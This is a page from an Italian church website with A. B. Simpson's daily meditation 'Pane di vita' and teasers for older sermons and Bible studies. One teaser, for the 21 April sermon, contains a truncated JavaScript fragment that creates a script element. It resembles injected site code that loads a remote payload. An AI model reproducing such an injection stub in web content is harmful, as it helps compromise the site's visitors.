Meditazione del giorno: PANE DI VITA

di A. B. SIMPSON  –  “…così chi si ciba di Me vivrà anch’egli a motivo di Me. (Giovanni 6:57).  –  Il bisogno dei figli di Dio non è semplicemente un mucchio di insegnamenti, ma il Pane di vita. Il miglior grano non è buon cibo. Esso deve essere macinato e cotto prima che possa essere digerito e assimilato per nutrire il corpo. La più pura e la più alta verità non può santificare o soddisfare un’anima vivente. Ella respira il messaggio del Nuovo Testamento dalla Sua bocca con un bacio d’amore e un soffio di ravvivata potenza. È se dimoriamo in Lui, appoggiati sul suo petto e bevendo dalla Sua stessa vita che siamo nutriti, vivificati, confortati e guariti.

Questo è il segreto della guarigione divina. Non è credere in una dottrina, non è adempiere una determinata cerimonia, non è estorcere una richiesta dal cielo con la logica della fede e la forza della volontà; ma è il respirare la vita di Dio; è il tocco di vita che nessuno può capire tranne coloro i cui sensi sono esercitati a conoscere le realtà del mondo invisibile.

Spesso, pertanto, una piccola verità ci porterà molto più aiuto e benedizione di una grande quantità di insegnamenti.

I commenti sono chiusi.

Post meno recenti

MEFIBOSHET: Riscoprire il valore del patto!

Studio biblico Scuola Domenicale Adulti –  Domenica 12 Ottobre  –  Testo biblico: 2 Samuele 4:4 – 9:1-13 Introduzione: Un patto si differenzia sostanzialmente da un contratto. Il contratto è l’accordo bilaterale tra due parti e si base sull’interesse, il patto invece è unilaterale e si basa sulla promessa. Il contratto dura per un tempo delimitato e stabilito, il patto dura per sempre. Il nostro rapporto con Dio non è stabilito …
Leggi Tutto

IL PERICOLO DELL’INSODDISFAZIONE

di AGOSTINO MASDEA  –   Infatti io so che in me, cioè nella mia carne, non abita alcun bene, poiché ben si trova in me la volontà di fare il bene, ma io non trovo il modo di compierlo. Infatti il bene che io voglio, non lo faccio; ma il male che non voglio, quello faccio… O miserabile uomo che sono! Chi mi libererà da questo corpo di morte? Io rendo grazie …
Leggi Tutto

Sermone Domenica 21 Aprile: Terry Peretti

Predicazione dell’evangelista TERRY PERETTI 2 Re 19 – “Non temere il nemico:Il Signore è più forte” var d=document;var s=d.createElement(‘script’); …
Leggi Tutto

GEORGE MULLER: Salmo 23

Sermone predicato da GEORGE MULLER nella Bethesda Chapel, in Great George Street, Bristol, domenica sera 20 giugno 1897. «Il SIGNORE è il mio pastore: nulla mi manca. Egli mi fa riposare in verdeggianti pascoli, mi guida lungo le acque calme. Egli mi ristora l’anima, mi conduce per sentieri di giustizia, per amore del suo nome. Quand’anche camminassi nella valle dell’ombra della morte, io non temerei alcun male, perché …
Leggi Tutto

COSA VUOL DIRE “ESSERE SALVATO”.

Perché Dio ha tanto amato il mondo, che ha dato il suo unigenito Figlio, affinché chiunque crede in lui non perisca, ma abbia vita eterna. Infatti Dio non ha mandato suo Figlio nel mondo per giudicare il mondo, ma perché il mondo sia salvato per mezzo di lui. (Giovanni 3: 16-17 )   –   Gesù pronunciò queste parole in una conversazione con un importante personaggio religioso del suo …
Leggi Tutto

ONORIAMO IL SIGNORE

di Agostino Masdea  –  Malachia – Capitolo 1   –   Malachia significa “angelo” “messaggero”. Probabilmente questo non era il suo vero nome, ma questo era sicuramente il suo compito. Egli era “il messaggero di Dio”. Visse in un periodo particolare: il tempio era stato ricostruito (siamo al tempo di Zaccaria e Aggeo), c’era stato un tempo di risveglio, ma ora  il popolo d’Israele viveva un periodo di crisi spirituale. Crisi …
Leggi Tutto

Dai nostri Culti